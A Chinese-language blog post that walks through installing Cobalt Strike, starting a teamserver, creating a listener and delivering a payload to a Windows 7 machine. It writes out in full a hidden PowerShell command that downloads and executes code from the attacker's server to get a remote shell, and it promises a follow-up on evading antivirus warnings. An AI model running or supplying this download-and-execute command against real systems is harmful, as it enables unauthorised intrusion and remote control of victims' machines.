Cobalt Strike安装使用并回弹一个shell

Cobalt Strike安装使用并回弹一个shell

Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。

Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。也是一个C/S结构的工具

首先登陆远程服务器,cs是一个团队协作的工具,而且可以隐藏后端攻击者ip,所以远程登录到服务器上,并安装叫java8

在服务器上执行

./teamserver 10.14.4.16 123

ip是你服务器的公网/内网地址 123是连接密码

在客户端上运行。

用户名随意,密码123

连接后

这就已经成功连接到服务器上了。

接下来创建一个监听事件

在这里创建一个监听事件,监听端口选择8088

beacon的地址也选择外网地址反射回的,如果前端没有其他转发服务器的话。

监听建立成功。

接下来生成shell

attacks》web drive-by》

目标机器是win7,那么我使用powershell来远程下载。

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://10.14.4.16:80/aaaa’))”

生成代码已经给出了

在win下执行命令

可以看到,已经上线了。

稍后可能会写怎么绕过火绒的提醒,执行shell

0

Related Posts

Comments

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.